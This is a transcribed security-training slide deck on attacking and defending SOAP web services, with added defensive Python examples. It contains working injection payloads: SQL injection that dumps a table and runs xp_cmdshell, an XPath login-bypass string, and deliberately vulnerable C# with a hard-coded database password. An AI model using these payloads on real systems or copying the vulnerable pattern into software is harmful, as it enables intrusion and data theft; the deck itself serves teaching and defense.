Web Services Hacking and Security
Recent analysis of Cloud App
• Enterprise Content Management – Cloud App
• Technologies & Components – APIs, OAuth, SAML, SOAP, Ajax etc.
• Traditional Scanning – What to scan 
• Hacking and Hands-On
– SQL injection over APIs
– XSS on Mobile interface
– Authorization bypass (Look at other’s content)
– Information leaks through JSON fuzzing
– CSRF
– Virtual Sand Box bypasses
– Mobile interface compromised
Attacks
• Vulnerabilities in cloud infrastructures could allow attackers to locate and eavesdrop on targeted virtual machines (VMs) anywhere in the cloud.
• DDoS attack rains down on Amazon cloud
• Cross-VM side-channel attacks to extract information from a target VM on the same machine.
• The use of virtualization by cloud service providers to host virtual machines belonging to multiple customers on a shared physical infrastructure is opening up fresh data leak risks, a research report warns.
What is common in all?
• All over Web and HTTP
• Web security and hacking are very relevant to the Cloud
• Cloud = Web 2.0 + SOA + Something-Else
• Lots of hacks are already happening on Cloud apps over HTTP
• The game is changing and becoming interesting …
Security!
• Web services are evolving as a new attack point in application frameworks.
• Toolkits and exploits are coming up
• Too many protocols, and confusion
• Race for deployment – poor implementation
• Cases and attacks are growing with the growth in business usage
[Diagram: a Web Services Client sends an HTTP POST carrying a SOAP Envelope to the Web Server on 80/443, behind which sit the Web Services Engine, Web Services Binaries, Web Services Deployment Shell and Web Services Code & Components; the zones are labelled End Client, In Transit, Vendor Controlled and User Controlled]
Security!
[Diagram: web services risk model. Components: Web Services Engine, Web Services Resource, Web Services Deployment and Web Services Code, fronted by Defense Controls; backend resources: Database, File System, Network Resource; attack chain: Attack Agent, Attack Method, Attack Vector, Exploit, Vulnerability; an In Transit segment between client and service]
Assessment strategies
[Diagram: Web Services Risk Model, Web Services Defense Controls, Blackbox Assessment, Whitebox Assessment]
Technology Deployment
[Diagram: zones Internet, DMZ, Trusted and Internal/Corporate. A Web Service Client sends SOAP to the Web Server (IIS/Apache), which serves SOAP over HTTP/HTTPS; behind it the Application Servers (.Net/Tomcat) and the Web Services Container (Axis) handle XML parsing, WSDL, transport etc., and this is where the Web Services Code resides; the DB sits further back]
Web services evaluation methodology
[Diagram: methodology stages Footprinting, Discovery (public domain search), Enumeration, Manual Audit and Auto Audit, Defense]
Risk - In transit
• In transit Sniffing or Spoofing
• WS-Routing security concern
• Replay attacks
Risk - Web services Engine
• Buffer overflow
• XML parsing attacks
• Spoiling Schema
• Complex or Recursive structure as payload
• Denial of service
• Large payload
Web services Deployment - Risk
• Fault code leaks
• Permissions & Access issues
• Poor policies
• Customized error leakage
• Authentication and Certification
Web services User code - Risk
• Parameter tampering
• WSDL probing
• SQL/LDAP/XPATH/OS command injection
• Virus/Spyware/Malware injection
• Bruteforce
• Data type mismatch
• Content spoofing
• Session tampering
• Format string
• Information leakage
• Authorization
© Blueinfy Solutions Pvt. Ltd.
Scanning SOA
Web Service Search
• Search in the public domain
• Tool – Search Engines
• Google – An excellent tool
• Look for wsdl, asmx, jws etc.
• Filetype and allinurl are best friends
Technology Identification
• Platform on which Web services are running
• Configuration and Structures
• File extensions
• Path discovery
Very useful information!
Technology Identification
• Location can be obtained from UDDI as well, if already published.
• WSDL location [ Access Point ]
http://192.168.11.2/ws/dvds4less.asmx?wsdl
.asmx indicates a .Net server from MS
Technology Identification
• Similarly, .jws – for Java web services
• /ws/ - in the path indicates web services
• MS-SOAPToolkit can be identified as well
C:> nc 192.168.11.2 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 28 Sep 2004 18:48:20 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 7565
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSSRQDRC=LMMPKHNAAOFDHMIHAODOJHCO; path=/
Cache-control: private
Technology Identification
• The resource's response header throws up some information as well
C:> nc 192.168.11.2 80
HEAD /ws/dvds4less.asmx HTTP/1.0
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 28 Sep 2004 18:50:09 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3026
WSDL Scanning/Enumeration
• What is WSDL?
• What information can one enumerate from
WSDL?
• WSDL exposure: Threat or not?
WSDL
• Web Services Definition Language
• Similar to IDL for remote calls used in CORBA or other remote invoke methods.
• Contains detail of methods
• Types of I/O
• Parameters of methods
• It is an XML document with standards.
WSDL Nodes
[Diagram: WSDL node hierarchy: Data types, Message types, Operations, Binding, Service (access point)]
WSDL <Service>
<service name="dvds4less">
<port name="dvds4lessSoap" binding="s0:dvds4lessSoap">
<soap:address location="http://192.168.11.2/ws/dvds4less.asmx"/>
</port>
</service>
Where is the call going to go?
This is where the service is listening.
WSDL <portType>
<portType name="dvds4lessSoap">
<operation name="Intro">
<input message="s0:IntroSoapIn"/>
<output message="s0:IntroSoapOut"/>
</operation>
<operation name="getProductInfo">
<input message="s0:getProductInfoSoapIn"/>
<output message="s0:getProductInfoSoapOut"/>
</operation>
<operation name="getRebatesInfo">
<input message="s0:getRebatesInfoSoapIn"/>
<output message="s0:getRebatesInfoSoapOut"/>
</operation>
</portType>
Methods one can call
WSDL <Message>
<portType name="dvds4lessSoap">
<operation name="getProductInfo">
<input message="s0:getProductInfoSoapIn"/>
<output message="s0:getProductInfoSoapOut"/>
</operation>
</portType>
<message name="getProductInfoSoapIn">
<part name="parameters" element="s0:getProductInfo"/>
</message>
<message name="getProductInfoSoapOut">
<part name="parameters" element="s0:getProductInfoResponse"/>
</message>
WSDL <Types>
<s:element name="getProductInfo">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="getProductInfoResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="getProductInfoResult" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
<message name="getProductInfoSoapIn">
<part name="parameters" element="s0:getProductInfo"/>
</message>
<message name="getProductInfoSoapOut">
<part name="parameters" element="s0:getProductInfoResponse"/>
</message>
WSDL Profile after Scan
Methods         INPUT      OUTPUT
Intro           - None -   String
getProductInfo  String     String
getRebatesInfo  String     String
SOAP in Action
How to access?
• Knowing WSDL profile – What next?
• Access web services
– see what goodies you can get
• How?
How to access SOAP?
• Simple Object Access Protocol
• Invoking objects on remote machine
• I/O with remote objects
• It is XML-based messaging
• Works over HTTP/HTTPS and a few other protocols
• That is why a firewall cannot block them.
• Attacks are easy and possible.
SOAP request
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfo xmlns="http://tempuri.org/">
<id>1</id>
</getProductInfo>
</soap:Body>
</soap:Envelope>
[Slide callouts: SOAP Envelope; Method Call; Input to the method]
SOAP response
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfoResponse xmlns="http://tempuri.org/">
<getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
</getProductInfoResponse>
</soap:Body>
</soap:Envelope>
[Slide callouts: SOAP Envelope; Method response; Output of the method]
SOA Attacks
AV 1 - XML poisoning
• XML node manipulation
• Attack on parsing logic
– SAX
– DOM
• Can be lethal – DoS or breaking execution logic
XML poisoning
<CustomerRecord>
<CustomerNumber>289001</CustomerNumber>
<FirstName>John</FirstName>
<LastName>Smith</LastName>
<Address>Apt 31, 1st Street</Address>
<Email>john@smith.com</Email>
<PhoneNumber>3809922347</PhoneNumber>
</CustomerRecord>
XML poisoning
<CustomerRecord>
<CustomerNumber>289001</CustomerNumber>
<FirstName>John</FirstName>
<CustomerNumber>289001</CustomerNumber>
<FirstName>John</FirstName>
<LastName>Smith</LastName>
<Address>Apt 31, 1st Street</Address>
<Email>john@smith.com</Email>
<PhoneNumber>3809922347</PhoneNumber>
</CustomerRecord>
XML poisoning
<CustomerRecord>
<CustomerNumber>289001</CustomerNumber>
<FirstName>John</FirstName>
<FirstName>John</FirstName>
... (repeated 100 times) ...
<FirstName>John</FirstName>
<LastName>Smith</LastName>
<Address>Apt 31, 1st Street<Address>
<Email>john@smith.com<Email>
<PhoneNumber>3809922347<PhoneNumber>
</CustomerRecord>
Parameter tampering & Fault code leakage
• Fault codes of web services spit out a lot of information about internal workings.
• This attack can fetch internal paths, database interfaces etc.
• The fault code is part of the SOAP envelope, and this helps an attacker make logical deductions about assets.
SOAP request
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getRebatesInfo xmlns="http://tempuri.org/">
<fileinfo>abx.xyz</fileinfo>
</getRebatesInfo>
</soap:Body>
</soap:Envelope>
[Slide callouts: SOAP Envelope; Method Call; Input to the method; Forcing Fault Code; Source of Enumeration]
SOAP response
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<soap:Fault>
<faultcode>soap:Server</faultcode>
<faultstring>Server was unable to process request. --&gt; Could not find file
&amp;quot;c:\inetpub\wwwroot\rebates\abx.xyz&amp;quot;.</faultstring>
<detail />
</soap:Fault>
</soap:Body>
</soap:Envelope>
[Slide callouts: Path Enumeration; Fault Code]
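Defense 4 later lists fault code management; as an added example that is not from the slides, this Python sanitizes an outgoing SOAP fault so a client never sees a faultstring like the one above: the detailed text is logged under a reference id and replaced with a generic message. The sample faults are constructed after the ones shown on the slides.

```python
import logging
import re
import uuid
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
ET.register_namespace("soap", SOAP_NS)
log = logging.getLogger("soap-fault")

# Markers of a faultstring that leaks internal detail: local file paths, database
# engine messages and the '-->' inner-exception chain seen in the slides' faults.
LEAK_PATTERNS = [
    re.compile(r"[A-Za-z]:\\[^\s\"']+"),                            # Windows path
    re.compile(r"/(?:inetpub|var|usr|home|etc|opt)/\S+"),            # Unix path
    re.compile(r"(?i)(sql server|oledb|odbc|syntax error|column names?|xp_\w+)"),
    re.compile(r"-->"),                                             # inner exception chain
]

def is_leaky(faultstring):
    return any(p.search(faultstring) for p in LEAK_PATTERNS)

def sanitize_fault(envelope_xml):
    """Return (envelope to send, reference id). Non-fault envelopes and faults
    that carry no internal detail pass through unchanged with reference None."""
    root = ET.fromstring(envelope_xml)
    fault = root.find(f"{{{SOAP_NS}}}Body/{{{SOAP_NS}}}Fault")
    if fault is None:
        return envelope_xml, None
    faultstring = fault.find("faultstring")      # unqualified in SOAP 1.1
    original = (faultstring.text or "") if faultstring is not None else ""
    if not is_leaky(original):
        return envelope_xml, None
    ref = uuid.uuid4().hex[:12]
    log.error("SOAP fault %s: %s", ref, original)  # full message stays server-side
    faultstring.text = f"The request could not be processed (reference {ref})."
    detail = fault.find("detail")
    if detail is not None:
        detail.clear()                             # drop stack traces and exception detail
    return ET.tostring(root, encoding="unicode"), ref

def fault_envelope(faultstring_xml):
    """Build a SOAP 1.1 fault envelope around an already XML-escaped faultstring."""
    return ('<soap:Envelope xmlns:soap="' + SOAP_NS + '"><soap:Body><soap:Fault>'
            '<faultcode>soap:Server</faultcode><faultstring>' + faultstring_xml +
            '</faultstring><detail /></soap:Fault></soap:Body></soap:Envelope>')

# Constructed faults modelled on the two shown in the slides, plus a harmless one.
PATH_LEAK_FAULT = fault_envelope(
    "Server was unable to process request. --&gt; Could not find file "
    "&quot;c:\\inetpub\\wwwroot\\rebates\\abx.xyz&quot;.")
SQL_LEAK_FAULT = fault_envelope(
    "Server was unable to process request. --&gt; Cannot use empty object or "
    "column names. Use a single space if necessary.")
CLEAN_FAULT = fault_envelope("Invalid product id.")
```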
AV 3 - SQL injection
• SQL injection can be done using SOAP traffic.
• It is an innovative way of identifying database interface points.
• One can leverage xp_cmdshell via SOAP.
• The back end database can be compromised using this attack.
SOAP request
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfo xmlns="http://tempuri.org/">
<id>1</id>
</getProductInfo>
</soap:Body>
</soap:Envelope>
[Slide callouts: SOAP Envelope; Method Call; Input to the method]
SOAP response
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfoResponse xmlns="http://tempuri.org/">
<getProductInfoResult>/(1)Finding Nemo($14.99)/
</getProductInfoResult>
</getProductInfoResponse>
</soap:Body>
</soap:Envelope>
[Slide callout: Product Information]
SOAP response
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<soap:Fault>
<faultcode>soap:Server</faultcode>
<faultstring>Server was unable to process request. --&gt; Cannot use
empty object or column names. Use a single space if necessary.</faultstring>
<detail />
</soap:Fault>
</soap:Body>
</soap:Envelope>
[Slide callouts: Fault Code; Indicates SQL Server; Place for SQL Injection]
SOAP request
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfo xmlns="http://tempuri.org/">
<id>1 or 1=1</id>
</getProductInfo>
</soap:Body>
</soap:Envelope>
[Slide callouts: Popular SQL Injection; Fault Code]
SOAP response
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfoResponse xmlns="http://tempuri.org/">
<getProductInfoResult>/(1)Finding Nemo($14.99)/
/(2)Bend it like Beckham($12.99)/
/(3)Doctor Zhivago($10.99)/
/(4)A Bug's Life($13.99)/
/(5)Lagaan($12.99)/
/(6)Monsoon Wedding($10.99)/
/(7)Lawrence of Arabia($14.99)/
</getProductInfoResult>
</getProductInfoResponse>
</soap:Body>
</soap:Envelope>
[Slide callouts: Works!! Entire table is out]
SOAP request
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfo xmlns="http://tempuri.org/">
<id>1;EXEC master..xp_cmdshell 'dir c: > c:\inetpub\wwwroot\ws\dir.txt'</id>
</getProductInfo>
</soap:Body>
</soap:Envelope>
[Slide callouts: Exploiting this Vulnerability; Exploit code]
SOAP response
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfoResponse xmlns="http://tempuri.org/">
<getProductInfoResult>/(1)Finding Nemo($14.99)/
</getProductInfoResult>
</getProductInfoResponse>
</soap:Body>
</soap:Envelope>
[Slide callouts: Works!! Looks like a normal response, but the code got executed; Got Admin via cmdshell]
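The two outcomes above, as an added example that is not the slides' code: an in-memory SQLite catalogue constructed from the seven titles in the response, the concatenating lookup that turns id '1 or 1=1' into the whole table, and the parameterized and validated lookups that do not. SQLite stands in for SQL Server here, so only the injection pattern, not the xp_cmdshell step, is reproduced.

```python
import sqlite3

# Constructed in-memory catalogue with the seven titles and prices seen in the
# '1 or 1=1' response on the slides.
PRODUCTS = [
    (1, "Finding Nemo", 14.99), (2, "Bend it like Beckham", 12.99),
    (3, "Doctor Zhivago", 10.99), (4, "A Bug's Life", 13.99),
    (5, "Lagaan", 12.99), (6, "Monsoon Wedding", 10.99),
    (7, "Lawrence of Arabia", 14.99),
]

def open_catalogue():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, title TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn

def format_result(rows):
    # Same /(id)title($price)/ layout as getProductInfoResult on the slides
    return "".join(f"/({pid}){title}(${price:.2f})/" for pid, title, price in rows)

def get_product_info_vulnerable(conn, id_value):
    # The <id> text from the SOAP body is spliced straight into the statement,
    # so '1 or 1=1' becomes part of the WHERE clause and matches every row.
    sql = f"SELECT id, title, price FROM products WHERE id = {id_value}"
    return format_result(conn.execute(sql).fetchall())

def get_product_info_safe(conn, id_value):
    # Bound parameter: the value is compared as one literal and never parsed
    # as SQL, so '1 or 1=1' simply matches nothing.
    rows = conn.execute(
        "SELECT id, title, price FROM products WHERE id = ?", (id_value,)
    ).fetchall()
    return format_result(rows)

def get_product_info_validated(conn, id_value):
    # Defense in depth: enforce the contract the WSDL cannot express (id is a
    # product number) before the value reaches the database at all.
    if not str(id_value).isdigit():
        raise ValueError("id must be a positive integer")
    return get_product_info_safe(conn, int(id_value))
```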
AV 4 – XPATH injection
• XPATH is a new way of querying XML documents.
• This attack works nicely on web services since they use XML extensively.
• A developer's loophole can be leveraged with an exploit.
• XPATH query crafting is a next generation attack method.
XPATH Injection - Basics
• XPATH is a language defined to find information in an XML document.
• As the name suggests, XPATH uses a path to traverse the nodes of an XML document and look for specific information in it.
• XPATH provides expressions like slash (/), double slash (//), dot (.), double dot (..), @, =, <, > etc. to traverse through an XML document.
XPATH – Vulnerable Code
string fulltext = "";
string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass";
SqlXmlCommand co = new SqlXmlCommand(coString);
co.RootTag = "Credential";
co.CommandType = SqlXmlCommandType.Sql;
co.CommandText = "SELECT * FROM users for xml Auto";
XmlReader xr = co.ExecuteXmlReader();
xr.MoveToContent();
fulltext = xr.ReadOuterXml();
XmlDocument doc = new XmlDocument();
doc.LoadXml(fulltext);
// user and pass come straight from the request and are concatenated into the XPath expression
string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
XmlNodeList xmln = doc.SelectNodes(credential);
string temp;
if (xmln.Count > 0)
{
    // True: a node matched, credentials accepted
}
else
{
    // False
}
Attacking XPATH point
• //users[@username='"+user+"' and @password='"+pass+"']";
• XPATH parsing can be leveraged by passing the following string: ' or 1=1 or ''='
• This is always true on the first node, so the user gets access as whoever the first user is.
• //users[@username='' or 1=1 or ''='' and @password='any']
Bingo!
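The vulnerable concatenation above beside a hardened version, as an added example that is not from the slides. The user document is constructed to match the FOR XML AUTO shape the C# loads; build_query_safe shows XPath literal quoting, and authenticate shows the stronger fix of keeping the password out of the query altogether.

```python
import hmac
import re
import xml.etree.ElementTree as ET

# Constructed document in the shape 'SELECT * FROM users FOR XML AUTO' produces:
# one <users> element per row, columns as attributes. Real stores would hold
# password hashes; plain values are used here only to keep the example short.
USERS_XML = """<Credential>
  <users username="admin" password="s3cret-admin"/>
  <users username="john" password="nemo1499"/>
</Credential>"""

USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")   # allowlist, assumed policy

def load_users(xml_text=USERS_XML):
    return ET.fromstring(xml_text)

def build_query_vulnerable(user, pw):
    # Same concatenation as the slide: a quote in either value rewrites the predicate.
    return "//users[@username='" + user + "' and @password='" + pw + "']"

def xpath_literal(value):
    # XPath 1.0 has no parameter binding, so a value can only be embedded as a
    # literal; quotes inside it are handled by switching delimiters or concat().
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"

def build_query_safe(user, pw):
    return f"//users[@username={xpath_literal(user)} and @password={xpath_literal(pw)}]"

def authenticate(doc, user, pw):
    """Hardened check: allowlisted username, lookup by username only, and the
    password compared in code (constant time) instead of inside the query."""
    if not USERNAME_RE.match(user):
        return False
    matches = [n for n in doc.iter("users") if n.get("username") == user]
    if len(matches) != 1:
        return False
    stored = matches[0].get("password", "")
    return hmac.compare_digest(stored.encode("utf-8"), pw.encode("utf-8"))
```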
AV 6 – LDAP injection
• LDAP authentication in place
• Possible to manipulate LDAP queries
• May lead to enumeration OR manipulation
• Interesting attack vector
• Fault code leaks LDAP interface
AV 7 – File System access
• Identifying file system points
• Directory traversal & access
• Leads to file access and source code exposure
• Lethal if found!
AV 7 – SOAP brute forcing
• The SOAP envelope carries user and password values.
• It is possible to brute force the SOAP envelope and look for specific responses.
• This is a possible attack which can get into the system.
• Analyzing the SOAP response is key for this set of attacks.
AV 8 – Parameter overflow
• Adding large buffers to XML nodes
• Depending on code controls, handling may fail
• Breaking the application
• May compromise as well
• Traditional buffer overflow type attacks
AV 9 – Operating System access
• Point to OS
• Remote command execution is possible
• Either by “|” or “;”
• Attack is very much possible
• Leads to admin/root on the box…
AV 10 – Session hijacking
• Web services can maintain sessions
• [WebMethod(EnableSession=true)]
• Possible to reverse engineer the session
• Cookie tampering is a reality…
• Can be compared to traditional web application sessions.
Other attacks
• External referencing – XML schema
• XSS attack
• In transit attacks – replay and spoofing
Securing SOA
Defense 1: SOAP filtering
• A regular firewall will not work
• Content filtering on HTTP will not work either, since it is SOAP over HTTP/HTTPS
• SOAP-level filtering and monitoring are required
• ISAPI-level filtering is essential
• SOAP content filtering – products or in-house
[Diagram: the Web Services Client sends a SOAP Envelope to the IIS Web Server; web2wall (Filter) sits in the IIS HTTP stack in front of the .Net Web Services and applies Rules for SOAP, rejecting envelopes that fail them]
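A SOAP-level filter of the kind this defense and the web2wall diagram describe, as an added example that is not the slides' or any product's code. It also covers the AV 1 XML poisoning payloads (repeated nodes, floods, malformed documents) and the AV 8 parameter overflow. The rules are constructed from the dvds4less WSDL profile, and the sample envelopes are constructed from the requests shown on the slides.

```python
import re
import xml.etree.ElementTree as ET
from collections import Counter

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SERVICE_NS = "http://tempuri.org/"

# Rules for SOAP, constructed from the dvds4less WSDL profile: the operations the
# service is meant to expose and, per parameter, the pattern the application
# really expects (id is a product number even though the WSDL types it s:string).
RULES = {
    "Intro": {},
    "getProductInfo": {"id": re.compile(r"^\d{1,9}$")},
    "getRebatesInfo": {"fileinfo": re.compile(r"^[A-Za-z0-9_-]{1,32}\.txt$")},
}
MAX_BYTES = 8 * 1024   # legitimate envelopes for this service are tiny (AV 8)
MAX_NODES = 64         # caps the repeated-node poisoning payloads (AV 1)
MAX_DEPTH = 6          # Envelope/Body/operation/parameter is depth 4

def _localname(tag):
    return tag.rsplit("}", 1)[-1]

def _depth(el, d=1):
    return max([d] + [_depth(child, d + 1) for child in el])

def filter_envelope(raw):
    """Return (accepted, reason). Anything outside the rules is rejected before
    the service's own parser and code ever see it."""
    if len(raw) > MAX_BYTES:
        return False, "payload too large"
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        return False, f"malformed XML: {exc}"
    if sum(1 for _ in root.iter()) > MAX_NODES:
        return False, "too many nodes"
    if _depth(root) > MAX_DEPTH:
        return False, "nesting too deep"
    if root.tag != f"{{{SOAP_NS}}}Envelope":
        return False, "not a SOAP envelope"
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None or len(body) != 1:
        return False, "body must carry exactly one operation"
    op = body[0]
    if not op.tag.startswith("{" + SERVICE_NS + "}"):
        return False, "operation outside service namespace"
    name = _localname(op.tag)
    if name not in RULES:
        return False, f"operation not exposed: {name}"
    # Repeated parameter nodes are the XML poisoning pattern from AV 1: refuse them.
    if any(n > 1 for n in Counter(child.tag for child in op).values()):
        return False, "repeated parameter node"
    for param in op:
        pname = _localname(param.tag)
        pattern = RULES[name].get(pname)
        if pattern is None:
            return False, f"unexpected parameter: {pname}"
        if len(param) or not pattern.match(param.text or ""):
            return False, f"parameter {pname} fails pattern"
    return True, "ok"

def envelope(body_xml):
    """Wrap an operation element in a SOAP 1.1 envelope (used for the samples)."""
    return (f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
            f"{body_xml}</soap:Body></soap:Envelope>")

# Constructed sample envelopes, the first two taken from the slides' requests.
OP = f'xmlns="{SERVICE_NS}"'
GOOD_REQUEST = envelope(f"<getProductInfo {OP}><id>1</id></getProductInfo>")
INJECTED_REQUEST = envelope(f"<getProductInfo {OP}><id>1 or 1=1</id></getProductInfo>")
POISONED_REQUEST = envelope(f"<getProductInfo {OP}>" + "<id>1</id>" * 3 + "</getProductInfo>")
FLOODED_REQUEST = envelope(f"<getProductInfo {OP}>" + "<id>1</id>" * 100 + "</getProductInfo>")
MALFORMED_REQUEST = envelope(f"<getProductInfo {OP}><id>1<id></getProductInfo>")
UNKNOWN_OPERATION = envelope(f"<deleteProduct {OP}><id>1</id></deleteProduct>")
```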
Defense 2: WSDL hardening
• WSDL is a major source of information
• Should not have any leakage
• Only provide necessary methods
• Invoke over SSL only
• Harden WSDL thoroughly
Defense 3: Authentication & Authorization
• WSDL access control
• Use of SAML
• Credentials – WS-Security
• Certificate analysis
• SOAP and XML filtering before access
Defense 4: Secure Coding
• Fault code management and Exception control
• Input validation
• SQL integration
• Levels of coding using different components
Defense 5: XML parsing
• A robust XML parser should be used
• .Net/J2EE – may have issues with XML parsing
• Buffer overflows using schema poisoning
Conclusion

Mobile Application Scan and TestingBlueinfy Solutions
 
Mobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseMobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseBlueinfy Solutions
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Blueinfy Solutions
 
iOS Application Security Testing
iOS Application Security TestingiOS Application Security Testing
iOS Application Security TestingBlueinfy Solutions
 
Automation In Android & iOS Application Review
Automation In Android & iOS 	Application Review�Automation In Android & iOS 	Application Review�
Automation In Android & iOS Application ReviewBlueinfy Solutions
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SASTBlueinfy Solutions
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionBlueinfy Solutions
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationBlueinfy Solutions
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approachBlueinfy Solutions
 
HTTP protocol and Streams Security
HTTP protocol and Streams SecurityHTTP protocol and Streams Security
HTTP protocol and Streams SecurityBlueinfy Solutions
 

More from Blueinfy Solutions (20)

Mobile Application Scan and Testing
Mobile Application Scan and TestingMobile Application Scan and Testing
Mobile Application Scan and Testing
 
Mobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseMobile security chess board - attacks & defense
Mobile security chess board - attacks & defense
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013
 
iOS Application Security Testing
iOS Application Security TestingiOS Application Security Testing
iOS Application Security Testing
 
Html5 on mobile
Html5 on mobileHtml5 on mobile
Html5 on mobile
 
Android secure coding
Android secure codingAndroid secure coding
Android secure coding
 
Android attacks
Android attacksAndroid attacks
Android attacks
 
Automation In Android & iOS Application Review
Automation In Android & iOS 	Application Review�Automation In Android & iOS 	Application Review�
Automation In Android & iOS Application Review
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SAST
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
Defending against Injections
Defending against InjectionsDefending against Injections
Defending against Injections
 
XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal Injection
 
Blind SQL Injection
Blind SQL InjectionBlind SQL Injection
Blind SQL Injection
 
Application fuzzing
Application fuzzingApplication fuzzing
Application fuzzing
 
SQL injection basics
SQL injection basicsSQL injection basics
SQL injection basics
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approach
 
HTTP protocol and Streams Security
